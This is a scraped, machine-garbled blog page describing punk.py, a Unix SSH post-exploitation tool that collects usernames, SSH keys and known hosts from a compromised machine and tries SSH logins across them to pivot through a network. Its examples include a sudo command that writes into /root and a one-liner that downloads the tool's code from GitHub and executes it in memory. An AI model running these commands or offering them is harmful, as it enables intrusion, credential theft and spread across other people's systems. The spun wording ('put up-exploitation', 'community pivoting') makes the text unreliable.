Punk.Py – Unix SSH Post-Exploitation Tool

0
18
Punk.Py - Unix SSH Post-Exploitation  Tool

unix SSH post-exploitation 1337 instrument

the way it works
punk.py is a put up-exploitation instrument meant to assist community pivoting from a compromised unix field. It acquire usernames, ssh keys and recognized hosts from a unix system, then it tries to attach through ssh to all of the combos discovered. punk.py is wrote with a view to work on customary python2 installations.

examples
customary execution:

 ~$ ./punk.py

skip passwd checks and use a customized residence path:

 ~$ ./punk.py --no-passwd --home /residence/ldapusers/

execute instructions with sudo:

 ~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"

one-liner fileless ( with –no-passwd parameter ):

 ~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

TODO

MoreTip.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.